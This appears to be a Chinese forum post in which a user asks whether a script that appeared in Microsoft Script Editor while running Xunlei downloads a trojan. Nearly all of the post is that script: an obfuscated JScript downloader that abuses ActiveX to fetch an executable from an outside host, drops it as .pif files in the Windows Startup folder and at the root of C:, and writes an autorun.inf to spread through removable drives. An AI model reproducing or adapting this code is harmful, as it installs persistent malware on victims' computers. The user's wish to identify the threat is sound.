这段代码是在运行迅雷时候,弹出的MicroSoft Script Editor出现的代码。应该是将一个木马下载到你的电脑上去吧?
var id = "\x63\x6C\x61\x73\x73\x69\x64";
var id2 = "\143\154";
var id3 = "\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60";
var id4 = "\163\151\144\72\102\104\71";
var id5 = "\101\55\60\60\103\60\64";
var id6 = "\55\71\70\63";
var id7 = "\106\103\62\71\105\63\66";
var object = document.createElement("o"+"bje"+"ct");
var idx = id2+id4+id3+id6+id5+id7;
object.setAttribute(id,idx);
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
function userSend()
{
xmlHttp.open('\107\105\124','http://loveip.ddns.info/love2/herdow.ex',true);
xmlHttp.onReadyStateChange = userResponse;
xmlHttp.send();
}
function userResponse()
{
if(xmlHttp.readyState == 4)
{
var adodbStream = object.CreateObject("Adodb.Stream","");
var cuteqqcn = '\\..\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\System.pif';
var cuteqqcn2 = "\103\72\134\134\115\151\143\162\157\123\157\146\164\163\56\160\151\146";
var cuteqqcn3 = "\103\72\134\134\141\165\164\157\162\165\156\56\151\156\146";
var chilam = "[AutoRun]"+"\n"+"OPEN=MicroSofts.pif"+"\n"+"shellexecute=MicroSofts.pif"+"\n"+"shell\Auto\command=MicroSofts.pif";
var cuteqq = object.CreateObject("Scripting.FileSystemObject","");
var temp = cuteqq.GetSpecialFoLder(0);
cuteqqcn = cuteqq.BuildPath(temp,cuteqqcn);
adodbStream.Type = 2;
adodbStream.OpEn();
adodbStream.WriteText=chilam;
adodbStream.Savetofile(cuteqqcn3,2);
adodbStream.Close();
adodbStream.type = 1;
adodbStream.OpEn();
adodbStream.Write(xmlHttp.responseBody);
adodbStream.SaveToFile(cuteqqcn2,2);
adodbStream.SaveToFile(cuteqqcn,2);
adodbStream.Close();
}
}
userSend();
